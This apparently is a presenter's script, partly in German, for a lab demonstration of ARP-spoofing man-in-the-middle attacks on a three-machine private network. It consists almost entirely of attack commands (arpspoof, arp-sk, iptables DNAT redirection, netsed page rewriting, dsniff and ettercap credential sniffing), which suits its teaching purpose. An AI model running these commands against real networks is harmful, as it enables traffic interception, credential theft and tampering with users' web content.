script fuer demo
^^^^^^^^^^^^^^^^


setup
^^^^^
[baraddur] bash setup
[apple] ftp, apache = on
[winxp] ipconfig

10.0.0.3 Angreifer - Gentoo Linux [baraddur]
10.0.0.2 Opfer - Windows XP [winxp]
10.0.0.1 Gateway/Server - Mac OS X [apple]

script
^^^^^^
[baraddur]
nmap -sP 10.0.0.1-3
arp -n | grep -v incomplete

[winxp]
ping
arp -a
show http sites


[baraddur]
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 10.0.0.1
CTRL-C

[winxp]
arp -a
ping 10.0.0.1
arp -a

[baraddur]
# create
arp-sk -i eth1 -w -d 00:03:FF:C9:7A:A0 -S 10.0.0.23 -D 10.0.0.2
CTRL-C
--> head


[winxp]
arp -a

[baraddur]
# modify
arp-sk -i eth1 -r -d 00:03:FF:C9:7A:A0 -S 10.0.0.1 -D 10.0.0.2
--> head

[winxp]
arp -a

[baraddur]
# sniffing
tcpdump -x -n -i eth1 'tcp port 80'
# oder
urlsnarf -n -i eth1 

[winxp]
run sites

[baraddur]
vim RewriteProxy.pl
./RewriteProxy.pl
iptables -t nat --flush

[winxp]
index, kernel


[baraddur]
iptables -t nat -A PREROUTING -p tcp --dport 80 -s 10.0.0.2 -j DNAT --to-destination 10.0.0.3:8080
netsed tcp 8080 10.0.0.1 80 's/Bush/Ape'                                                                                     
flush

[winxp]
politics

[baraddur]
dsniff -i eth1 -n

[winxp]
ftp login

# da geht was:
FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP,
       OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA,
       Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL protocols

[baraddur]
webmitm --help


[ettercap]
tcpdump -n -p -i eth1 'not host 10.0.0.1'
show ettercap plugin source
ettercap -C
target: mac/ip/port
